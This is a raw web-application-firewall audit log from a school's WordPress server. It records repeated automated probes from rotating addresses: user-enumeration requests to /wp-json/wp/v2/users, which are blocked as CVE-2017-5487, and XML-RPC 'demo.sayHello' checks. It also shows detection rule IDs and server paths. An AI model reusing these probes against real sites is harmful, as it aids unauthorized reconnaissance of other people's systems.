Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c622573f-Z-- --c522351e-A-- [17/May/2025:22:04:26 +0700] aCilenyxdQCiyU1ENFeWqQAAAAE 103.236.140.4 56760 103.236.140.4 8181 --c522351e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c522351e-C-- demo.sayHello --c522351e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c522351e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494266635031 5034 (- - -) Stopwatch2: 1747494266635031 5034; combined=3674, p1=466, p2=3012, p3=32, p4=29, p5=80, sr=77, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c522351e-Z-- --b84b8d52-A-- [17/May/2025:22:04:56 +0700] aCilmOm4kjNN-hEbWjKZvAAAAFQ 103.236.140.4 57422 103.236.140.4 8181 --b84b8d52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b84b8d52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84b8d52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494296837155 2750 (- - -) Stopwatch2: 1747494296837155 2750; combined=1285, p1=431, p2=825, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84b8d52-Z-- --2e401342-A-- [17/May/2025:22:05:03 +0700] aCilnwTOsBn9MSWb6WLInQAAAJA 103.236.140.4 57562 103.236.140.4 8181 --2e401342-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e401342-C-- demo.sayHello --2e401342-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e401342-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494303791956 5078 (- - -) Stopwatch2: 1747494303791956 5078; combined=3819, p1=555, p2=3065, p3=30, p4=29, p5=82, sr=70, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e401342-Z-- --e95a247c-A-- [17/May/2025:22:05:21 +0700] aCilsXyxdQCiyU1ENFeXCwAAAA0 103.236.140.4 57894 103.236.140.4 8181 --e95a247c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e95a247c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e95a247c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494321527512 2667 (- - -) Stopwatch2: 1747494321527512 2667; combined=1312, p1=412, p2=866, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e95a247c-Z-- --45d47b5d-A-- [17/May/2025:22:05:25 +0700] aCiltem4kjNN-hEbWjKZzQAAAFg 103.236.140.4 57978 103.236.140.4 8181 --45d47b5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --45d47b5d-C-- demo.sayHello --45d47b5d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --45d47b5d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494325652029 6084 (- - -) Stopwatch2: 1747494325652029 6084; combined=4939, p1=630, p2=4064, p3=40, p4=45, p5=96, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45d47b5d-Z-- --afbe970c-A-- [17/May/2025:22:08:01 +0700] aCimUXyxdQCiyU1ENFeXsAAAABM 103.236.140.4 60876 103.236.140.4 8181 --afbe970c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --afbe970c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afbe970c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494481968795 3108 (- - -) Stopwatch2: 1747494481968795 3108; combined=1354, p1=443, p2=876, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afbe970c-Z-- --a3f9d54f-A-- [17/May/2025:22:08:08 +0700] aCimWBKi5m5upc8uMd4L8AAAANg 103.236.140.4 32788 103.236.140.4 8181 --a3f9d54f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3f9d54f-C-- demo.sayHello --a3f9d54f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f9d54f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494488766588 5682 (- - -) Stopwatch2: 1747494488766588 5682; combined=4184, p1=534, p2=3420, p3=33, p4=34, p5=96, sr=76, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f9d54f-Z-- --e430796f-A-- [17/May/2025:22:08:08 +0700] aCimWBKi5m5upc8uMd4L8gAAAMY 103.236.140.4 32794 103.236.140.4 8181 --e430796f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e430796f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e430796f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494488800074 2346 (- - -) Stopwatch2: 1747494488800074 2346; combined=1145, p1=427, p2=681, p3=0, p4=0, p5=37, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e430796f-Z-- --a463c654-A-- [17/May/2025:22:08:14 +0700] aCimXgTOsBn9MSWb6WLJPAAAAJc 103.236.140.4 32896 103.236.140.4 8181 --a463c654-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a463c654-C-- demo.sayHello --a463c654-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a463c654-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494494295913 7728 (- - -) Stopwatch2: 1747494494295913 7728; combined=5956, p1=774, p2=4892, p3=50, p4=70, p5=102, sr=119, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a463c654-Z-- --847ab47f-A-- [17/May/2025:22:10:01 +0700] aCimyem4kjNN-hEbWjKa2QAAAEg 103.236.140.4 34140 103.236.140.4 8181 --847ab47f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --847ab47f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --847ab47f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494601148669 2886 (- - -) Stopwatch2: 1747494601148669 2886; combined=1281, p1=414, p2=835, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --847ab47f-Z-- --1cfe570e-A-- [17/May/2025:22:10:06 +0700] aCimzum4kjNN-hEbWjKa3wAAAEQ 103.236.140.4 34238 103.236.140.4 8181 --1cfe570e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1cfe570e-C-- demo.sayHello --1cfe570e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cfe570e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494606758686 5417 (- - -) Stopwatch2: 1747494606758686 5417; combined=3935, p1=535, p2=3194, p3=32, p4=34, p5=83, sr=64, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cfe570e-Z-- --43048e1a-A-- [17/May/2025:22:10:57 +0700] aCinAXyxdQCiyU1ENFeYgAAAAAg 103.236.140.4 35166 103.236.140.4 8181 --43048e1a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --43048e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43048e1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494657260536 2783 (- - -) Stopwatch2: 1747494657260536 2783; combined=1267, p1=407, p2=832, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43048e1a-Z-- --fe413e0c-A-- [17/May/2025:22:11:04 +0700] aCinCOm4kjNN-hEbWjKbLQAAAEY 103.236.140.4 35318 103.236.140.4 8181 --fe413e0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe413e0c-C-- demo.sayHello --fe413e0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe413e0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494664527986 4550 (- - -) Stopwatch2: 1747494664527986 4550; combined=3304, p1=436, p2=2585, p3=28, p4=29, p5=124, sr=53, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe413e0c-Z-- --ded1c727-A-- [17/May/2025:22:11:22 +0700] aCinGnyxdQCiyU1ENFeYnwAAABM 103.236.140.4 35652 103.236.140.4 8181 --ded1c727-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ded1c727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ded1c727-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494682464386 2999 (- - -) Stopwatch2: 1747494682464386 2999; combined=1282, p1=424, p2=824, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ded1c727-Z-- --e28b077b-A-- [17/May/2025:22:11:29 +0700] aCinIQTOsBn9MSWb6WLJ5QAAAI0 103.236.140.4 35792 103.236.140.4 8181 --e28b077b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e28b077b-C-- demo.sayHello --e28b077b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e28b077b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494689989400 6633 (- - -) Stopwatch2: 1747494689989400 6633; combined=4945, p1=634, p2=4066, p3=39, p4=42, p5=98, sr=94, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e28b077b-Z-- --309ba72e-A-- [17/May/2025:22:12:02 +0700] aCinQgTOsBn9MSWb6WLKLQAAAIQ 103.236.140.4 36420 103.236.140.4 8181 --309ba72e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.176 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --309ba72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --309ba72e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494722537581 2829 (- - -) Stopwatch2: 1747494722537581 2829; combined=1273, p1=415, p2=828, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --309ba72e-Z-- --3d8b1d10-A-- [17/May/2025:22:12:10 +0700] aCinSgTOsBn9MSWb6WLKQQAAAIg 103.236.140.4 36576 103.236.140.4 8181 --3d8b1d10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.176 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d8b1d10-C-- demo.sayHello --3d8b1d10-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d8b1d10-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 